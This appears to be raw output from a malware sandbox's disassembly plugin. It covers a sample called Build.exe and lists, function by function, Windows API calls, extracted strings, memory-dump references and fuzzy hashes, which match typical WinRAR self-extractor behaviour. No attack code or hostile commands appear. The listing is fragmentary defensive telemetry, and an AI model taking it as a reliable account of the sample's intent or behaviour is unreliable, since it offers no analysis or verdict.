Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe$STARTDLG$pPF$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3014515783-283195811
Opcode ID: 4984ad913281a1f6788c202103ff790eb7f3e6ac1ea3fc54633dfc2c6471e3b3
Instruction ID: 4a01b7bbcac4874e96ec1ec78dbba37e7d07015c2b065c612e78ab2d2e8736ed
Opcode Fuzzy Hash: 4984ad913281a1f6788c202103ff790eb7f3e6ac1ea3fc54633dfc2c6471e3b3
Instruction Fuzzy Hash: EA71E671500340ABE320AF62EC49B7F76A8AB45746F01442FF64593292DF7DC954CB6E

Function 0042F963 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 684COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000800,D72E4020), ref: 0042F9CD

Part of subcall function 0042E208: _wcslen.LIBCMT ref: 0042E210

Part of subcall function 00432663: _wcslen.LIBCMT ref: 00432669

Part of subcall function 00433D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,D72E4020,?,?,D72E4020,00000001,0042DA04,00000000,D72E4020,?,00020494,?,?), ref: 00433D2C

_wcslen.LIBCMT ref: 0042FD00
__fprintf_l.LIBCMT ref: 0042FE50

Strings

@%s:, xrefs: 0042FE3A, 0042FE46
,, xrefs: 0042FE8B
*messages***, xrefs: 0042FAD1
*messages***, xrefs: 0042FB0A
RTL, xrefs: 0042FE12
$%s:, xrefs: 0042FE33
|lE, xrefs: 0042FCD1

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL$|lE
API String ID: 2646189078-3233726565
Opcode ID: 1757cdafcbac07e599cd4c384f945afa83dcaef04f92ed9576ac343f90985e24
Instruction ID: 2e0edd3671fbdcae5f20e0bd86185ce262c04cee217e210e734fa1d666626b8f
Opcode Fuzzy Hash: 1757cdafcbac07e599cd4c384f945afa83dcaef04f92ed9576ac343f90985e24
Instruction Fuzzy Hash: 6D42E371A00229ABDF24DFA4E851BEE77B4FF18704F90013FE905A7281EB795949CB58

Function 0043C652 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0043DA3D,00000066), ref: 0043C665
SizeofResource.KERNEL32(00000000,?,?,?,0043DA3D,00000066), ref: 0043C67C
LoadResource.KERNEL32(00000000,?,?,?,0043DA3D,00000066), ref: 0043C693
LockResource.KERNEL32(00000000,?,?,?,0043DA3D,00000066), ref: 0043C6A2
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0043DA3D,00000066), ref: 0043C6BD
GlobalLock.KERNEL32(00000000,?,?,?,?,?,0043DA3D,00000066), ref: 0043C6CE
GlobalUnlock.KERNEL32(00000000), ref: 0043C756

Part of subcall function 0043C5B6: GdipAlloc.GDIPLUS(00000010), ref: 0043C5BC

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0043C737
GlobalFree.KERNEL32(00000000), ref: 0043C75D

Strings

PNG, xrefs: 0043C656

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 77a272d2695c55da1cefb66582646f2ccb02965d32575e40ab78c379ef688f83
Instruction ID: d029be2c5be82245aa7eda5bd37247da2cbfd0cdf51dd66325fa699e3a31f563
Opcode Fuzzy Hash: 77a272d2695c55da1cefb66582646f2ccb02965d32575e40ab78c379ef688f83
Instruction Fuzzy Hash: 7B316171600702ABD711AF21EC88D2B7FA8EF49752F15052AFD05A3262EB35D814CFA9

Function 0042C4A8 Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?,00000000), ref: 0042C4E6

Part of subcall function 0042DA1E: _wcslen.LIBCMT ref: 0042DA59

FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?), ref: 0042C516
GetLastError.KERNEL32(?,?,00000800,?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?,00000000,0000003A), ref: 0042C522
FindNextFileW.KERNEL32(?,?,00000000,?,?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?,00000000), ref: 0042C549
GetLastError.KERNEL32(?,?,0042C39F,000000FF,?,?,?,?,004287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0042C555

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: af1c61b1ad79c34c967b4f4f568eb3681c672b5e7db74d3270a162451e5fd353
Instruction ID: ae92d21f63faa7677f487db6f5f3559f11826a5320a7403092584c9cdf9d0968
Opcode Fuzzy Hash: af1c61b1ad79c34c967b4f4f568eb3681c672b5e7db74d3270a162451e5fd353
Instruction Fuzzy Hash: 1E4173B1608751ABC314DF24D8C09EFF3E8BB48750F80491EF5A9D3241D778E9848B96

Function 0044A640 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0044A616,?,0045F7B0,0000000C,0044A76D,?,00000002,00000000), ref: 0044A661
TerminateProcess.KERNEL32(00000000,?,0044A616,?,0045F7B0,0000000C,0044A76D,?,00000002,00000000), ref: 0044A668
ExitProcess.KERNEL32 ref: 0044A67A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: bc2998244926b9024942112baa01fa58c1a02ef3892e0caa2b219045f84225f4
Instruction ID: 2eb2f63c5a457323629a9a8cd640321711c6a0b59293cfc1f0d02011bd38db0f
Opcode Fuzzy Hash: bc2998244926b9024942112baa01fa58c1a02ef3892e0caa2b219045f84225f4
Instruction Fuzzy Hash: EFE04F31040208AFDF116F60CD0894D3B6AEB40756F464025F84847232CB3ADC52CA48

Function 0043290A Relevance: 101.8, APIs: 23, Strings: 35, Instructions: 327
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00432937
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00432949
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00432973
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00432C1D
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00432C37
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00432C4B
ReadFile.KERNEL32(00000000,?,00007FFE,$oE,00000000), ref: 00432C69
CloseHandle.KERNEL32(00000000), ref: 00432CCD
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00432CE6
CompareStringW.KERNEL32(00000400,00001001,poE,?,DXGIDebug.dll,?,$oE,?,00000000,?,00000800), ref: 00432D3A
GetFileAttributesW.KERNELBASE(?,?,$oE,00000800,?,00000000,?,00000800), ref: 00432D64
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00432DA0

Part of subcall function 004328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004328D4
Part of subcall function 004328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00431309,Crypt32.dll,00000000,00431383,00000200,?,00431366,00000000,00000000,?), ref: 004328F4

_swprintf.LIBCMT ref: 00432E12
_swprintf.LIBCMT ref: 00432E5E
AllocConsole.KERNEL32 ref: 00432E66
GetCurrentProcessId.KERNEL32 ref: 00432E70
AttachConsole.KERNEL32(00000000), ref: 00432E77
_wcslen.LIBCMT ref: 00432E8C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00432E9D
WriteConsoleW.KERNEL32(00000000), ref: 00432EA4
Sleep.KERNEL32(00002710), ref: 00432EAF
FreeConsole.KERNEL32 ref: 00432EB5
ExitProcess.KERNEL32 ref: 00432EBD

Strings

pE, xrefs: 00432A41
xtE, xrefs: 00432BC3
dsE, xrefs: 00432B4A
LsE, xrefs: 00432B3F
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00432E4C
(tE, xrefs: 00432BA2
poE, xrefs: 00432D2C
\qE, xrefs: 00432A69
$sE, xrefs: 00432B29
(pE, xrefs: 00432A01
XpE, xrefs: 00432A11
SetDllDirectoryW, xrefs: 00432943
<oE, xrefs: 004329AE
XoE, xrefs: 004329B6
uxtheme.dll, xrefs: 00432DDF
4sE, xrefs: 00432B34
xrE, xrefs: 00432ADC
DqE, xrefs: 00432A61
oE, xrefs: 004329E9
\tE, xrefs: 00432BB8
kernel32, xrefs: 0043292D
ppE, xrefs: 00432A19
$rE, xrefs: 00432ABB
dwmapi.dll, xrefs: 004329D9, 00432DD5
tqE, xrefs: 00432A71
,qE, xrefs: 00432A59
<, xrefs: 00432D3A
xsE, xrefs: 00432B55
@pE, xrefs: 00432A09
DXGIDebug.dll, xrefs: 00432D26
SetDefaultDllDirectories, xrefs: 0043296D
`rE, xrefs: 00432AD1
<rE, xrefs: 00432AC6
DtE, xrefs: 00432BAD
$oE, xrefs: 00432C56, 00432C5A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
String ID: $oE$$rE$$sE$(pE$(tE$,qE$4sE$<$<oE$<rE$@pE$DXGIDebug.dll$DqE$DtE$LsE$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$XoE$XpE$\qE$\tE$`rE$dsE$dwmapi.dll$kernel32$poE$ppE$tqE$uxtheme.dll$xrE$xsE$xtE$oE$pE
API String ID: 270162209-3849800942
Opcode ID: 6444153bdf517ecc17422a4518eaff5344b90279b7297226aae72cbd39af764a
Instruction ID: 4f7ca9830d8677797eb285d915215833d123668f11df1bda88e0315e733a841e
Opcode Fuzzy Hash: 6444153bdf517ecc17422a4518eaff5344b90279b7297226aae72cbd39af764a
Instruction Fuzzy Hash: DED1C8B10083409BD330DF50E948B9F7BE8AB8570AF51592FF98997292C7B8854CCB5E

Function 0043DAE0 Relevance: 97.0, APIs: 47, Strings: 8, Instructions: 750windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00421366: GetDlgItem.USER32(00000000,00003021), ref: 004213AA
Part of subcall function 00421366: SetWindowTextW.USER32(00000000,004565F4), ref: 004213C0

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043DC06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043DC24
IsDialogMessageW.USER32(?,?), ref: 0043DC37
TranslateMessage.USER32(?), ref: 0043DC45
DispatchMessageW.USER32(?), ref: 0043DC4F
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0043DC72
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0043DC95
GetDlgItem.USER32(?,00000068), ref: 0043DCB8
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043DCD3
SendMessageW.USER32(00000000,000000C2,00000000,004565F4), ref: 0043DCE6

Part of subcall function 0043F77B: _wcslen.LIBCMT ref: 0043F7A5

SetFocus.USER32(00000000), ref: 0043DCED
_swprintf.LIBCMT ref: 0043DD4C

Part of subcall function 00424C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00424C13

GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0043DDAF
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0043DDD7
GetTickCount.KERNEL32 ref: 0043DDF5
_swprintf.LIBCMT ref: 0043DE0D
GetLastError.KERNEL32(?,00000011), ref: 0043DE3F
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 0043DE92
_swprintf.LIBCMT ref: 0043DEC9
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00473482,00000200), ref: 0043DF1D
GetCommandLineW.KERNEL32(?,?,?,?,00473482,00000200), ref: 0043DF33
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00473482,00000400,00000001,00000001,?,?,?,?,00473482,00000200), ref: 0043DF8A
ShellExecuteExW.SHELL32(?), ref: 0043DFB2
Sleep.KERNEL32(00000064,?,?,?,?,00473482,00000200), ref: 0043DFFA
UnmapViewOfFile.KERNEL32(?,?,0000421C,00473482,00000400,?,?,?,?,00473482,00000200), ref: 0043E023
CloseHandle.KERNEL32(?,?,?,?,?,00473482,00000200), ref: 0043E02C
_swprintf.LIBCMT ref: 0043E05F
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043E0BE
SetDlgItemTextW.USER32(?,00000065,004565F4), ref: 0043E0D5
GetDlgItem.USER32(?,00000065), ref: 0043E0DE
GetWindowLongW.USER32(00000000,000000F0), ref: 0043E0ED
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0043E0FC
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043E1A9
_wcslen.LIBCMT ref: 0043E1FF
_swprintf.LIBCMT ref: 0043E229
SendMessageW.USER32(?,00000080,00000001,00020495), ref: 0043E273
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0043E28D
GetDlgItem.USER32(?,00000068), ref: 0043E296
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0043E2AC
GetDlgItem.USER32(?,00000066), ref: 0043E2C6
SetWindowTextW.USER32(00000000,0047589A), ref: 0043E2E8
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0043E348
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043E35B
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 0043E3FE
EnableWindow.USER32(00000000,00000000), ref: 0043E4CC
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0043E50E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043E532

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 0043DEB8
__tmp_rar_sfx_access_check_%u, xrefs: 0043DDFC
%s, xrefs: 0043E219
STARTDLG, xrefs: 0043DB2D
LICENSEDLG, xrefs: 0043E3F3
"%s"%s, xrefs: 0043E04E
C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe, xrefs: 0043E11E, 0043E2FE
winrarsfxmappingfile.tmp, xrefs: 0043DEF3

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3247240745-2458967494
Opcode ID: 32c580e5f884a7985b9007b23318fc91016afb50497e152774a37b993e32db7d
Instruction ID: eabb08352f4b9e9af59c6be0e01569be780155d6b1b6ae977c2a82cbe3e69a74
Opcode Fuzzy Hash: 32c580e5f884a7985b9007b23318fc91016afb50497e152774a37b993e32db7d
Instruction Fuzzy Hash: 0E42F871940344BAEB21AF61EC4AFBF3768AB09B05F50542FF544A62D1DBBC4A44CB2D

Function 0043F7FC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043D875
Part of subcall function 0043D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043D886
Part of subcall function 0043D864: IsDialogMessageW.USER32(00020494,?), ref: 0043D89A
Part of subcall function 0043D864: TranslateMessage.USER32(?), ref: 0043D8A8
Part of subcall function 0043D864: DispatchMessageW.USER32(?), ref: 0043D8B2

GetDlgItem.USER32(00000068,00483CF0), ref: 0043F81F
ShowWindow.USER32(00000000,00000005,?,?,0043D099,00000001,?,?,0043DAB9,004582F0,00483CF0,00483CF0,00001000,004650C4,00000000,?), ref: 0043F844
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043F853
SendMessageW.USER32(00000000,000000C2,00000000,004565F4), ref: 0043F861
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043F87B
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0043F895
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043F8D9
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0043F8E4
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043F8F7
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043F91E
SendMessageW.USER32(00000000,000000C2,00000000,0045769C), ref: 0043F92D

Strings

\, xrefs: 0043F885

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: e08b525278342646fe29ba6d78c2b7def235f694338af343896b1c12c5ac8e96
Instruction ID: 9919553a253b80e3a7516c752578bbe038a961870abe6f0a494ba381b694d5e9
Opcode Fuzzy Hash: e08b525278342646fe29ba6d78c2b7def235f694338af343896b1c12c5ac8e96
Instruction Fuzzy Hash: 4331D2B16493006FE310EF24DC5AF6F7BA8FB45B44F100D2DF5A19A292D7A49908877E

Function 0043FAFC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0043FB35
ShellExecuteExW.SHELL32(?), ref: 0043FC78
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043FCB0
GetExitCodeProcess.KERNEL32(?,?), ref: 0043FCEC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043FD12
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043FD78

Strings

.exe, xrefs: 0043FD1C
.inf, xrefs: 0043FC34

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 6a3bb4b95bd56eb2b3928f563e09db65252ef85e5f565282f59b1ce5e2e7761c
Instruction ID: dd02b0de029ac3f5cd3dc187e2a18793c3adc973d5fca2b9816acd9312494e76
Opcode Fuzzy Hash: 6a3bb4b95bd56eb2b3928f563e09db65252ef85e5f565282f59b1ce5e2e7761c
Instruction Fuzzy Hash: 4761D1719083849AD7309F20E8446ABB7E4AB88744F04683FF8C597351DB7CE98D8B5E

Function 0044CFAB Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00447F99,00447F99,?,?,?,0044D1FC,00000001,00000001,62E85006), ref: 0044D005
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044D1FC,00000001,00000001,62E85006,?,?,?), ref: 0044D08B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044D185
__freea.LIBCMT ref: 0044D192

Part of subcall function 0044BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00446A24,?,0000015D,?,?,?,?,00447F00,000000FF,00000000,?,?), ref: 0044BCC0

__freea.LIBCMT ref: 0044D19B
__freea.LIBCMT ref: 0044D1C0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cd47ee5504516185c9aba4044f017d197ed302e237ecd09f34d29b5d7cedeae9
Instruction ID: 5708c1bbdfb849f4898cd3899f0b9573e6ea2b92b1963ef781984117db2f4cd2
Opcode Fuzzy Hash: cd47ee5504516185c9aba4044f017d197ed302e237ecd09f34d29b5d7cedeae9
